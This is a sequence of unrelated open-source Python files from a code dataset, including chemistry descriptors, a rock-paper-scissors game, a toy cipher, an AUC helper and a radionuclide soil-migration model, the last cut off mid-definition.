There should be at least 3 blockrows per process\")\n # Central processes need at least 3 (block) rows to work.\n \n \n \n \ndef divide_matrix(A: np.ndarray, \n n_partitions: int, \n blocksize: int) -> [list, list]:\n \"\"\" Compute the n_partitions segments that divide the matrix A.\n\n Parameters\n ----------\n A : numpy matrix \n matrix to divide\n n_partitions : int\n number of partitions\n blocksize : int\n size of a block\n\n Returns\n -------\n l_start_blockrow : list\n list of processes starting block index\n l_partitions_blocksizes : list\n list of processes partition size\n \"\"\"\n\n nblocks = A.shape[0] // blocksize\n partition_blocksize = nblocks // n_partitions\n blocksize_of_first_partition = nblocks - partition_blocksize * (n_partitions-1)\n\n # Compute the starting block row and the partition size for each process\n l_start_blockrow = []\n l_partitions_blocksizes = []\n\n for i in range(n_partitions):\n if i == 0:\n l_start_blockrow = [0]\n l_partitions_blocksizes = [blocksize_of_first_partition]\n else:\n l_start_blockrow.append(l_start_blockrow[i-1] + l_partitions_blocksizes[i-1])\n l_partitions_blocksizes.append(partition_blocksize)\n\n return l_start_blockrow, l_partitions_blocksizes\n\n","repo_name":"Nano-TCAD/SINV","sub_path":"src/sinv/algorithms/psr/psr_utils.py","file_name":"psr_utils.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38701929623","text":"# Rock-paper-scissors-lizard-Spock template\n\n\n# The key idea of this program is to equate the strings\n# \"rock\", \"paper\", \"scissors\", \"lizard\", \"Spock\" to numbers\n# as follows:\n#\n# 0 - rock\n# 1 - Spock\n# 2 - paper\n# 3 - lizard\n# 4 - scissors\n\n# helper functions\n\nimport random\n\ndef name_to_number(name):\n # delete the following pass statement and fill in your code below\n \n if name == \"rock\":\n return 0\n elif name == \"Spock\":\n return 1\n elif name == \"paper\":\n return 2\n elif name == \"lizard\":\n return 3\n elif name == \"scissors\":\n return 4\n else:\n return \"Error: name_to_number function!\"\n\n # convert name to number using if/elif/else\n # don't forget to return the result!\n\n\ndef number_to_name(number):\n # delete the following pass statement and fill in your code below\n \n if number == 0:\n return \"rock\"\n elif number == 1:\n return \"Spock\"\n elif number == 2:\n return \"paper\"\n elif number == 3:\n return \"lizard\"\n elif number == 4:\n return \"scissors\"\n else:\n return \"Error: number_to_name function!\"\n \n # convert number to a name using if/elif/else\n # don't forget to return the result!\n \n\ndef rpsls(player_choice): \n # delete the following pass statement and fill in your code below\n \n \n # print a blank line to separate consecutive games\n \n print()\n\n # print out the message for the player's choice\n \n print(\"Player's choice is... \" + '\"' + player_choice + '\"')\n\n # convert the player's choice to player_number using the function name_to_number()\n \n player_choice = name_to_number(player_choice)\n\n # compute random guess for comp_number using random.randrange()\n \n comp_number = random.randrange(0,5)\n\n # convert comp_number to comp_choice using the function number_to_name()\n \n comp_choice = number_to_name(comp_number)\n \n # print out the message for computer's choice\n \n print(\"Computer's choice is... 
\" + '\"' + comp_choice + '\"')\n\n # compute difference of comp_number and player_number modulo five\n \n if isinstance(player_choice, int) == True:\n winner = (player_choice - comp_number) % 5\n else:\n winner = \"Error: Value is not an integer!\"\n \n # use if/elif/else to determine winner, print winner message\n \n if (winner > 0) and (winner <= 2):\n print(\"The winner is... Player!\")\n elif (winner > 2) and (winner <= 4):\n print(\"The winner is... Computer!\")\n elif winner == 0:\n print(\"It is a draw! Try again...\")\n else:\n print(\"Error: Invalid input!\")\n\n \n# test your code - THESE CALLS MUST BE PRESENT IN YOUR SUBMITTED CODE\nrpsls(\"rock\")\nrpsls(\"Spock\")\nrpsls(\"paper\")\nrpsls(\"lizard\")\nrpsls(\"scissors\")\n\n# always remember to check your completed program against the grading rubric\n\n\n","repo_name":"notsky23/Rock-Paper-Scissors-Lizzard-Spock","sub_path":"Rock-Paper-Scissors-Lizard-Spock.py","file_name":"Rock-Paper-Scissors-Lizard-Spock.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15288554294","text":"# This is a library of 24 electrostatic potential based molecular descriptors \r\n# based on Hunter, C. A. (2004). Angewandte Chemie - International Edition, 43(40), 5310–5324\r\n# https://doi.org/10.1002/anie.200301739\r\n# This code was created by Andre Frade (with support of Patrick McCabe and Richard Cooper)\r\n\r\ntry:\r\n import os\r\n import pickle\r\n import numpy as np\r\n import pandas as pd\r\n from collections import namedtuple\r\n from rdkit import Chem\r\n from rdkit.Chem import AllChem\r\n from rdkit.ML.Descriptors import MoleculeDescriptors\r\n from rdkit.Chem.MolStandardize import rdMolStandardize\r\nexcept ImportError as e:\r\n print('Error {}'.format(e))\r\n\r\nclass ElectrostaticPotential:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n from rdkit import Chem\r\n mol = Chem.MolFromSmiles(smiles)\r\n \r\n ep = ElectrostaticPotential()\r\n ep_values = ep.calc_electrostatic_potential_descriptors(mol)\r\n \r\n ep_values is a named tuple containing: MaxAlpha MaxBeta MinAlpha MinBeta TotalAlpha TotalBeta \r\n AverageAlpha AverageBeta AlphaMolWtNormalised BetaMolWtNormalised AlphaVSANormalised BetaVSANormalised\r\n AlphaLogPNormalised BetaLogPNormalised Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 Beta_VSA0\r\n Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4')\r\n \r\n :param ht_filename: absolute filename of csv file containing alpha, beta group values\r\n Alpha and beta group values taken from https://doi.org/10.1002/anie.200301739\r\n :param complexgroup_filename: absolute filename of metadata dict\r\n A complex group is a supergroup that contains subgroups. 
For example phenol contains a benzene and an alcohol\r\n \"\"\"\r\n \r\n \r\n import pkg_resources\r\n ht_filepath = pkg_resources.resource_filename('electrostatic_potential', 'data/ABvalues.csv')\r\n cg_filepath = pkg_resources.resource_filename('electrostatic_potential', 'data/complex_groups')\r\n \r\n with open(cg_filepath, \"rb\") as complexgroup_file:\r\n self._complex_groups = pickle.load(complexgroup_file)\r\n \r\n self._ht_df = pd.read_csv(ht_filepath) \r\n self._smarts_patterns = self._ht_df.smarts.values\r\n self._neutral_smiles = ''\r\n self._all_matches = {}\r\n self._all_indices = {}\r\n self._adjusted_matches = {}\r\n self._adjusted_indices = {}\r\n\r\n def _uncharge_molecule(self, mol):\r\n \r\n '''Neutralizes molecular charges for functional group identification.\r\n It may fail.'''\r\n \r\n smiles = Chem.MolToSmiles(mol)\r\n\r\n if '+' in smiles or '-' in smiles:\r\n uncharger = rdMolStandardize.Uncharger()\r\n mol = uncharger.uncharge(mol) \r\n \r\n self._neutral_smiles = Chem.MolToSmiles(mol)\r\n return mol\r\n\r\n def _find_group(self, smarts, mol):\r\n\r\n indices = []\r\n\r\n try:\r\n patt = Chem.MolFromSmarts(smarts)\r\n indices = [list(x) for x in mol.GetSubstructMatches(patt)]\r\n except RuntimeError as e:\r\n print('Error {} {}'.format(smarts, e))\r\n\r\n return indices\r\n\r\n def _find_matches(self, mol):\r\n\r\n self._all_matches = {}\r\n self._all_indices = {} \r\n \r\n for group in self._smarts_patterns:\r\n indices = self._find_group(group, mol)\r\n\r\n if len(indices) > 0:\r\n group = self._ht_df.group.loc[self._ht_df.smarts == group].values[0]\r\n self._all_matches[group] = len(indices)\r\n self._all_indices[group] = indices\r\n \r\n def _adjust_matches(self):\r\n \r\n adjusted_indices = dict(self._all_indices)\r\n \r\n # [1] ADJUST GROUP OCCURRENCE COUNT - check if no atom belongs to more than one group occurrence\r\n # =======================================================================\r\n \r\n #for i in adjusted_indices: print(i, adjusted_indices[i])\r\n for group in adjusted_indices:\r\n group_events = adjusted_indices[group]\r\n remove_ =[]\r\n for i in range(len(group_events)-1):\r\n if set(group_events[i]) & set(group_events[i+1]):\r\n remove_.append(group_events[i])\r\n for r in remove_:\r\n adjusted_indices[group].remove(r)\r\n \r\n # [2] ADJUST COMPLEX GROUP COUNT - remove subgroup counts\r\n # =======================================================================\r\n \r\n # get indices of cg and their potential sg identified in molecule\r\n # -----------------------------------------------------------------------\r\n for cg in self._complex_groups: # for each cg found in mol\r\n \r\n if not cg in adjusted_indices:\r\n continue\r\n \r\n for cg_indices in adjusted_indices[cg]: # get its indices\r\n temp = [] # accumulates sg indices overlapping each cg\r\n \r\n for sg in self._complex_groups[cg]: # and for the corresponding subgroups, get their indices too\r\n \r\n if not sg in adjusted_indices:\r\n continue\r\n \r\n # check whether any of the matches of a group is a sg (search by indices overlap)\r\n # ----------------------------------------------------------------------- \r\n for sg_indices in adjusted_indices[sg]:\r\n \r\n if set(cg_indices) & set(sg_indices): # check if sg and cg indices overlap\r\n\r\n if sg_indices not in temp: # if so, store the sg indices once\r\n temp.append(sg_indices)\r\n \r\n # keep only cg and simpler ones that don't act as sg\r\n # ----------------------------------------------------------------------- \r\n if 
sg in adjusted_indices: # keep simpler groups that dont act as sg\r\n keep = [x for x in adjusted_indices[sg] if x not in temp]\r\n adjusted_indices[sg] = keep\r\n\r\n self._adjusted_indices = { k:v for k, v in adjusted_indices.items() if len(v) > 0}\r\n self._adjusted_matches = { k:len(v) for k, v in adjusted_indices.items() if len(v) > 0}\r\n \r\n def _max_min_alpha_beta(self):\r\n\r\n max_alpha = 0\r\n max_beta = 0\r\n min_alpha = 0\r\n min_beta = 0\r\n\r\n groups = [group for group in self._adjusted_matches]\r\n alphas = self._ht_df.alpha.loc[self._ht_df.group.isin(groups)].values\r\n betas = self._ht_df.beta.loc[self._ht_df.group.isin(groups)].values\r\n\r\n if len(alphas) > 0:\r\n max_alpha = max(alphas)\r\n min_alpha = min(alphas)\r\n\r\n if len(betas) > 0:\r\n max_beta = max(betas)\r\n min_beta = min(betas)\r\n\r\n return max_alpha, max_beta, min_alpha, min_beta\r\n \r\n def _average_total_alpha_beta(self):\r\n \r\n total_alpha = 0\r\n total_beta = 0\r\n average_alpha = 0\r\n average_beta = 0\r\n \r\n groups = []\r\n for group in self._adjusted_matches:\r\n for i in range (self._adjusted_matches[group]): \r\n groups.append(group)\r\n \r\n alphas = [self._ht_df.alpha.loc[self._ht_df.group == group].values[0] for group in groups]\r\n betas = [self._ht_df.beta.loc[self._ht_df.group == group].values[0] for group in groups]\r\n \r\n if len(alphas) > 0:\r\n total_alpha = round(np.sum(alphas), 1)\r\n average_alpha = round(np.mean(alphas), 1)\r\n\r\n if len(betas) > 0:\r\n total_beta = round(np.sum(betas), 1)\r\n average_beta = round(np.mean(betas), 1)\r\n \r\n return total_alpha, total_beta, average_alpha, average_beta\r\n \r\n def _normalised_alpha_beta(self, mol, total_alpha, total_beta):\r\n \r\n alpha_mw_norm, beta_mw_norm = 0, 0\r\n alpha_vsa_norm, beta_vsa_norm = 0, 0\r\n alpha_logp_norm, beta_logp_norm = 0, 0\r\n \r\n # by MolWt\r\n '''The average molecular weight of the molecule'''\r\n obj = MoleculeDescriptors.MolecularDescriptorCalculator(['MolWt'])\r\n res = obj.CalcDescriptors(mol)\r\n mw = res[0]\r\n if mw > 0:\r\n alpha_mw_norm = round(total_alpha/mw,3)\r\n beta_mw_norm = round(total_beta/mw,3)\r\n \r\n # by VSA\r\n '''Labute. P. J. Mol. Graph. Mod. _18_ 464-477 (2000)'''\r\n vsa = Chem.MolSurf.LabuteASA(mol)\r\n if vsa > 0:\r\n alpha_vsa_norm = round(total_alpha/vsa,3)\r\n beta_vsa_norm = round(total_beta/vsa,3) \r\n \r\n # by LogP\r\n '''S. A. Wildman and G. M. Crippen JCICS 39 868-873 (1999)'''\r\n logp = Chem.Crippen.MolLogP(mol)\r\n if logp > 0: \r\n alpha_logp_norm = round(total_alpha/logp,3)\r\n beta_logp_norm = round(total_beta/logp,3) \r\n \r\n return alpha_mw_norm, beta_mw_norm, alpha_vsa_norm, beta_vsa_norm, alpha_logp_norm, beta_logp_norm\r\n\r\n def _VSA_alpha_beta(self, mol):\r\n \r\n ''' calculates Labute's Approximate Surface Area.\r\n Definition from P. Labute's article in the Journal of the Chemical Computing Group\r\n and J. Mol. Graph. Mod. 
_18_ 464-477 (2000)\r\n '''\r\n \r\n # calculate the per-atom contributions to the surface area\r\n (ats, hs)= Chem.rdMolDescriptors._CalcLabuteASAContribs(mol, includeHs = True)\r\n atomic_vsa = [round(vsa, 3) for vsa in ats]\r\n total_vsa = np.sum(atomic_vsa)\r\n \r\n # calculate the per-atom contributions to the Gasteiger partial charge\r\n # this dictates the most positive (donor) and negative (acceptor) atom of the group\r\n AllChem.ComputeGasteigerCharges(mol)\r\n atomic_pcharge = [round(mol.GetAtomWithIdx(i).GetDoubleProp('_GasteigerCharge'), 3) for i in range(mol.GetNumAtoms())]\r\n\r\n res_alpha = {}\r\n res_beta = {}\r\n \r\n for group in self._adjusted_indices: \r\n \r\n vsa_alpha = 0\r\n vsa_beta = 0\r\n \r\n # for each group event, get vsa of 'donnor' and 'acceptor' atoms\r\n for event in self._adjusted_indices[group]:\r\n \r\n # get p charge for elements in group\r\n local_pcharge = [atomic_pcharge[atom] for atom in event]\r\n local_vsa = [atomic_vsa[atom] for atom in event]\r\n \r\n # identify alpha (min p charge) and beta (max p charge) atoms, and retrieve their vsa contribution\r\n vsa_alpha += np.sum([local_vsa[i] for i in range(len(event)) if local_pcharge[i] == min(local_pcharge)])\r\n vsa_beta += np.sum([local_vsa[i] for i in range(len(event)) if local_pcharge[i] == max(local_pcharge)])\r\n \r\n # get group's alpha and beta value\r\n alpha = self._ht_df.alpha.loc[self._ht_df.group == group].values[0]\r\n beta = self._ht_df.beta.loc[self._ht_df.group == group].values[0]\r\n \r\n # store normalised vsa's for those alphas and betas\r\n res_alpha[alpha]= vsa_alpha/total_vsa\r\n res_beta[beta]= vsa_beta/total_vsa\r\n \r\n a_VSA0, a_VSA1, a_VSA2, a_VSA3, a_VSA4 = self._alpha_VSA(res_alpha)\r\n b_VSA0, b_VSA1, b_VSA2, b_VSA3, b_VSA4 = self._beta_VSA(res_beta)\r\n \r\n return a_VSA0, a_VSA1, a_VSA2, a_VSA3, a_VSA4, b_VSA0, b_VSA1, b_VSA2, b_VSA3, b_VSA4\r\n \r\n def _alpha_VSA(self, dic):\r\n \r\n ''' alpha: 5 bins, 1 unit interval [0], ]0, 1] ]1, 2] ]2, 3], ]3, inf['''\r\n\r\n alpha_VSA0 = 0\r\n alpha_VSA1 = 0\r\n alpha_VSA2 = 0\r\n alpha_VSA3 = 0\r\n alpha_VSA4 = 0\r\n\r\n for alpha in dic:\r\n\r\n if alpha == 0:\r\n alpha_VSA0 += dic[alpha]\r\n\r\n elif 0 < alpha <=1:\r\n alpha_VSA1 += dic[alpha]\r\n\r\n elif 1 < alpha <=2:\r\n alpha_VSA2 += dic[alpha]\r\n\r\n elif 2 < alpha <=3:\r\n alpha_VSA3 += dic[alpha]\r\n\r\n elif 3 < alpha:\r\n alpha_VSA4 += dic[alpha]\r\n\r\n return round(alpha_VSA0,3), round(alpha_VSA1,3), round(alpha_VSA2,3), round(alpha_VSA3,3), round(alpha_VSA4,3)\r\n \r\n def _beta_VSA(self, dic):\r\n \r\n ''' beta: 5 bins, 2 units interval [0, 2], ]2, 4] ]4, 6], ]6, 8], ]8, inf['''\r\n \r\n beta_VSA0 = 0\r\n beta_VSA1 = 0\r\n beta_VSA2 = 0\r\n beta_VSA3 = 0\r\n beta_VSA4 = 0\r\n\r\n for beta in dic:\r\n\r\n if 0 <= beta <=2:\r\n beta_VSA0 += dic[beta]\r\n\r\n elif 2 < beta <=4:\r\n beta_VSA1 += dic[beta]\r\n\r\n elif 4 < beta <=6:\r\n beta_VSA2 += dic[beta]\r\n\r\n elif 6 < beta <=8:\r\n beta_VSA3 += dic[beta]\r\n\r\n elif 8 < beta:\r\n beta_VSA4 += dic[beta]\r\n\r\n return round(beta_VSA0,3), round(beta_VSA1,3), round(beta_VSA2,3), round(beta_VSA3,3), round(beta_VSA4,3)\r\n \r\n def neutral_smiles(self):\r\n \r\n return self._neutral_smiles \r\n\r\n def adjusted_matches(self):\r\n \r\n return self._adjusted_matches\r\n \r\n def all_matches(self):\r\n\r\n return self._all_matches\r\n \r\n def calc_electrostatic_potential_descriptors(self, mol):\r\n \r\n '''\r\n :param mol: a mol object\r\n :return ep_values: a namedtuple containing \r\n MaxAlpha MaxBeta 
MinAlpha MinBeta \r\n TotalAlpha TotalBeta AverageAlpha AverageBeta \r\n AlphaMolWtNormalised BetaMolWtNormalised \r\n AlphaVSANormalised BetaVSANormalised \r\n AlphaLogPNormalised BetaLogPNormalised \r\n Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 \r\n Beta_VSA0 Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4\r\n .\r\n \r\n - MaxAlpha, MaxBeta: maximum alpha and beta values in the molecule\r\n - MinAlpha, MinBeta: minimum alpha and beta values in the molecule\r\n - TotalAlpha, TotalBeta: total sum of all alpha and beta values in a molecule\r\n - AverageAlpha, AverageBeta: total sum of all alpha and beta values in a molecule, averaged by nr of identified functional groups\r\n - AlphaMolWtNormalised, BetaMolWtNormalised: total sum of all alpha and beta values in a molecule normalised by MolWt\r\n - AlphaVSANormalised, BetaVSANormalised: total sum of all alpha and beta values in a molecule normalised by van der Waals surface area\r\n - AlphaLogPNormalised, BetaLogPNormalised: total sum of all alpha and beta values in a molecule normalised by LogP\r\n - Alpha_VSA0, Alpha_VSA1, Alpha_VSA2, Alpha_VSA3, Alpha_VSA4: fraction of surface area with a value of alpha between x and y\r\n - Beta_VSA0, Beta_VSA1, Beta_VSA2, Beta_VSA3, Beta_VSA4: fraction of surface area with a value of beta between x and y\r\n '''\r\n \r\n ep_values = namedtuple('ep_values', 'MaxAlpha MaxBeta MinAlpha MinBeta TotalAlpha TotalBeta AverageAlpha AverageBeta AlphaMolWtNormalised BetaMolWtNormalised AlphaVSANormalised BetaVSANormalised AlphaLogPNormalised BetaLogPNormalised Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 Beta_VSA0 Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4')\r\n \r\n mol = self._uncharge_molecule(mol)\r\n\r\n self._find_matches(mol)\r\n\r\n self._adjust_matches()\r\n\r\n ep_values.MaxAlpha, ep_values.MaxBeta, ep_values.MinAlpha, ep_values.MinBeta = self._max_min_alpha_beta()\r\n \r\n ep_values.TotalAlpha, ep_values.TotalBeta, ep_values.AverageAlpha, ep_values.AverageBeta = self._average_total_alpha_beta() \r\n \r\n ep_values.AlphaMolWtNormalised, ep_values.BetaMolWtNormalised, ep_values.AlphaVSANormalised, ep_values.BetaVSANormalised, ep_values.AlphaLogPNormalised, ep_values.BetaLogPNormalised = self._normalised_alpha_beta(mol, ep_values.TotalAlpha, ep_values.TotalBeta)\r\n\r\n ep_values.Alpha_VSA0, ep_values.Alpha_VSA1, ep_values.Alpha_VSA2, ep_values.Alpha_VSA3, ep_values.Alpha_VSA4, ep_values.Beta_VSA0, ep_values.Beta_VSA1, ep_values.Beta_VSA2, ep_values.Beta_VSA3, ep_values.Beta_VSA4 = self._VSA_alpha_beta(mol) \r\n\r\n return ep_values\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"apfrade/code_sample","sub_path":"electrostatic_potential/electrostatic_potential.py","file_name":"electrostatic_potential.py","file_ext":"py","file_size_in_byte":16808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"55740658","text":"from sklearn.metrics import roc_auc_score\r\nfrom numpy.random import seed\r\nimport tensorflow as tf\r\n\r\nseed(1)\r\ntf.random.set_seed(2)\r\n\r\n\r\ndef calculate_AUC(dataset, generator, predictions):\r\n \"\"\"\r\n :param dataset: dataset that is fed to generator\r\n :param generator: generator feeding images and labels to model\r\n :param predictions: predictions made on the validation set using the trained model\r\n :return: One-Vs-Rest AUC for multiclass case, 'normal' AUC for binary case\r\n \"\"\"\r\n # compute 
OneVsRest multi-class weighted AUC\r\n    if (dataset == 'stl10') | (dataset == 'sti10'):\r\n        # STL10 and STI10 are given to .flow() generators, so labels are stored in y-object of generator\r\n        OneVsRest_auc = roc_auc_score(generator.y, predictions, multi_class='ovr', average='weighted')\r\n    elif (dataset == \"isic\") | (dataset == 'textures') | (dataset == 'kimia'):\r\n        # .flow_from_dataframe() is used to get data, labels can be collected by calling classes object of generator\r\n        OneVsRest_auc = roc_auc_score(generator.classes, predictions, multi_class='ovr', average='weighted')\r\n    # in binary case, compute 'normal' AUC\r\n    elif (dataset == 'chest') | (dataset == 'pcam-small') | (dataset == 'pcam-middle'):\r\n        # .flow_from_dataframe() is used to get data, labels can be collected by calling classes object of generator\r\n        OneVsRest_auc = roc_auc_score(generator.classes, predictions)\r\n    print(f'Validation auc: {OneVsRest_auc}')\r\n\r\n    return OneVsRest_auc\r\n\r\n","repo_name":"vcheplygina/cats-scans","sub_path":"src/evaluation/auc_evaluation.py","file_name":"auc_evaluation.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"22182305995","text":"import sys\nfrom PIL import Image\nfrom os.path import exists\n\ndef run(matrix, config):\n    \"\"\"show a png image\"\"\"\n    effect_dir = config['effect_dir']\n    usage = \"Usage: ./run.sh image image-name.png\"\n    if len(config['argv']) != 1:\n        print(usage)\n        sys.exit()\n\n    image_file = effect_dir + '/' + config['argv'][0]\n    if not exists(image_file):\n        print(\"Error: file not found\")\n        print(usage)\n        sys.exit()\n\n    # The actual image\n    image = Image.open(image_file)\n\n    # send the image to matrix\n    matrix.image(image)\n    matrix.show()\n\n    # in virtual env this lets the image hang out for 5 seconds\n    matrix.delay(5000)\n","repo_name":"natelewis/pi-led-matrix","sub_path":"effects/image/effect.py","file_name":"effect.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"27017957663","text":"\"\"\"\ntake in a message and a code text, and shift each letter of the message\nby the corresponding letter in the code text\n\"\"\"\n\nalphabet = set('qwertyuiopasdfghjklzxcvbnm')\nletters = 'abcdefghijklmnopqrstuvwxyz'\nitoc = '\\\\' + letters # to start at 1\nctoi = {c: i+1 for (i,c) in enumerate(letters)}\n\ndef shift_up(c: str, delta: str) -> str:\n    i = ctoi[c] + ctoi[delta]\n    if i > 26:\n        i -= 26\n    return itoc[i]\n\n\ndef shift_down(c: str, delta: str) -> str:\n    i = ctoi[c] - ctoi[delta]\n    if i < 1:\n        i += 26\n    return itoc[i]\n\n\ndef clean(code: str):\n    code = code.lower()\n    code = filter(lambda c: c in alphabet, code)\n    code = ''.join(code)\n    return code\n\n\ndef encode_decode(message, code, shift):\n    message = message.lower()\n    code = clean(code)\n    i = 0 # msg index\n    j = 0 # code index\n    answer = []\n    while i < len(message) and j < len(code):\n        c = message[i]\n        delta = code[j]\n        if c in alphabet:\n            answer.append(shift(c, delta))\n            i += 1\n            j += 1\n        else:\n            answer.append(c)\n            i += 1\n    answer = ''.join(answer)\n    return answer\n\ndef encode(message, code):\n    return encode_decode(message, code, shift_up)\n\n\ndef decode(message, code):\n    return encode_decode(message, code, shift_down)\n\n\ndef encode_decode_io(transform):\n    with open('zodiac_message.txt', 'r') as f:\n        message = f.read()\n    with open('zodiac_code.txt', 'r') as f:\n        code = f.read()\n    
print(transform(message, code))\n\ndef decode_io():\n    encode_decode_io(decode)\n\n\ndef encode_io():\n    encode_decode_io(encode)\n\n\nif __name__ == '__main__':\n    encode_io()","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/zodiac.py","file_name":"zodiac.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"71773098385","text":"import csv\n\nwith open(\"Customer.csv\",\"r\",encoding=\"utf-8\") as file:\n    data = csv.reader(file, delimiter=\",\")\n    columns=next(data)\n    rows=tuple(data)\nx=[]\nfor row in rows:\n    x.append(row[8])\n\nprint(sorted(set(x)))","repo_name":"Kacyk27/Kacyk27-103-exercises-Advanced-Python-Programming","sub_path":"Exercise042.py","file_name":"Exercise042.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33558464012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMain executable file of the model for evaluating horizontal migration of radioisotopes into a closed lake from its catchment area\n\"\"\"\n\nimport sys\nimport os\nimport csv\nimport math\nimport numpy as np\nfrom datetime import datetime\nfrom tqdm import tqdm_notebook\n\nnp.random.seed(datetime.now().second)\ndatafile = 'perstok_data.csv'\noutfile = 'perstok_new.csv'\n\ncs137_decay_constant = 0.0229769\nam241_decay_constant = 0.0016023\ncs137_infiltration_constant = 0.0273\nam241_infiltration_constant = 0.0298\ncs137_infiltration_constant_2 = 0.0677\nam241_infiltration_constant_2 = 0.0658\n\nclass SoilCell:\n    \"\"\"\n    The class defines a cell with soil and plant cover, which is the main element of the model\n    \"\"\"\n    def __init__(self, x, y, elevation, land_type, cs_137=30000.0, am_241=1.0, size=100.0, soil_density=1.35, cs137_s_part=0.0015, w0=3.0):\n        isotope_layer = {}\n        self.x = x\n        self.y = y\n        self.soil_density = soil_density + 0.02*np.random.randn()\n        self.elevation = elevation\n        self.land_type = land_type\n        self.input_cells = []\n        self.up_way_cells = []\n        self.output_cell = None\n        self.model_R = 600000.0 + 50*np.random.randn()\n        self.model_P = 1\n        if self.land_type == 'f':\n            self.model_K = 0.020 + 0.001*np.random.randn()\n            self.model_C = 0.006 + 0.0003*np.random.randn()\n            self.model_LS = 0.1 + 0.001*np.random.randn()\n        elif self.land_type == 'l':\n            self.model_K = 0.0785 + 0.001*np.random.randn()\n            self.model_C = 0.05 + 0.0003*np.random.randn()\n            self.model_LS = 0.3 + 0.001*np.random.randn()\n        else :\n            self.model_K = 0.0\n            self.model_C = 0.0\n            self.model_LS = 0.0\n        self.size = size\n        self.angle = 0\n        self.uklon = 0\n        self.soil_loss = 0\n        self.sediment_inflow = 0\n        self.max_outflow_capacity = 0\n        self.w0 = w0 + 0.2*np.random.randn() # water stored in the migration-active soil layer, kg per 1 m^{2}\n        self.cs137 = {'top_layer': {'activity_concentration': cs_137 + 0.05*cs_137*np.random.randn(),\n                                    'zapas': 0.0,\n                                    'soluble_part': cs137_s_part + 0.0002*np.random.randn(),\n                                    'soluble_zapas': 0.0,\n                                    'activity_loss': 0.0,\n                                    'liquid_flow': 0.0},\n                      'bottom_layer': {'activity_concentration': 0,\n                                       'zapas': 0},\n                      'decay_constant': cs137_decay_constant,\n                      'infiltration_constant': cs137_infiltration_constant,\n                      'inflow': 0.0,\n                      'name': 'Cs-137'\n                      }\n        self.cs137['top_layer']['zapas'] = self.size**2 * self.cs137['top_layer']['activity_concentration'] * self.soil_density*(0.2*10*10)\n        self.cs137['top_layer']['soluble_zapas'] = self.cs137['top_layer']['soluble_part'] * 
self.cs137['top_layer']['zapas']\n\n        self.am241 = {'top_layer': {'activity_concentration': am_241 + 0.1*am_241*np.random.randn(),\n                                    'zapas': 0.0,\n                                    'activity_loss': 0.0,\n                                    'soluble_part': 0.0,\n                                    'soluble_zapas': 0.0,\n                                    'liquid_flow': 0.0},\n                      'bottom_layer': {'activity_concentration': 0,\n                                       'zapas': 0},\n                      'decay_constant': am241_decay_constant,\n                      'infiltration_constant': am241_infiltration_constant,\n                      'inflow': 0.0,\n                      'name': 'Am-241'\n                      }\n        self.am241['top_layer']['zapas'] = self.size**2 * self.am241['top_layer']['activity_concentration'] * self.soil_density*(0.2*10*10)\n        if self.land_type == 'f':\n            self.cs137['infiltration_constant'] = cs137_infiltration_constant_2\n            self.am241['infiltration_constant'] = am241_infiltration_constant_2\n        self.isotopes = [self.cs137, self.am241]\n\n    def calculateAngle(self):\n        max_diff = 0\n        for cell in self.up_way_cells:\n            if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.land_type != 'w':\n                diff = abs(self.elevation-cell.elevation)\n                if diff > max_diff:\n                    max_diff = diff\n                    if abs(cell.x-self.x) + abs(cell.y-self.y) == 1 :\n                        length = 100\n                    else :\n                        length = 141.4\n        if self.output_cell :\n            if abs(self.elevation - self.output_cell.elevation) > max_diff and self.output_cell.land_type != 'w':\n                max_diff = abs(self.elevation - self.output_cell.elevation)\n                if abs(self.output_cell.x-self.x) + abs(self.output_cell.y-self.y) == 1 :\n                    length = 100\n                else :\n                    length = 141.4\n        if max_diff > 0 :\n            self.uklon = max_diff / length\n            self.angle = max_diff/(math.sqrt(length**2+max_diff**2))\n\n    def calculateLS(self) :\n        self.calculateAngle()\n        # TODO Try with this calculation and with the default one\n        #self.model_LS = ((1+len(self.up_way_cells))*self.size/22.1)**0.4 * (self.angle*0.01745/0.09)**1.4\n\n    def calculate_max_outflow_capacity(self):\n        if self.uklon > 0:\n            tau_0 = 1005 * 9.8 * (0.003*np.random.randn() + 0.033) * self.uklon\n            g_s = 3.912 * tau_0 * (tau_0 - (0.03*np.random.randn() + 0.22)) / 9.8**2\n            s_w = 4 * (2*np.random.randn() + 30) * (0.003*np.random.randn() + 0.033)\n            self.max_outflow_capacity = g_s * s_w * (2*np.random.randn()+20)\n        else:\n            self.max_outflow_capacity = 0\n\n    def findInputCells(self, catchment):\n        stack = [self]\n        added = []\n        self.input_cells = []\n        while stack :\n            current = stack.pop()\n            added.append(current)\n            for cell in catchment :\n                if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.elevation > self.elevation 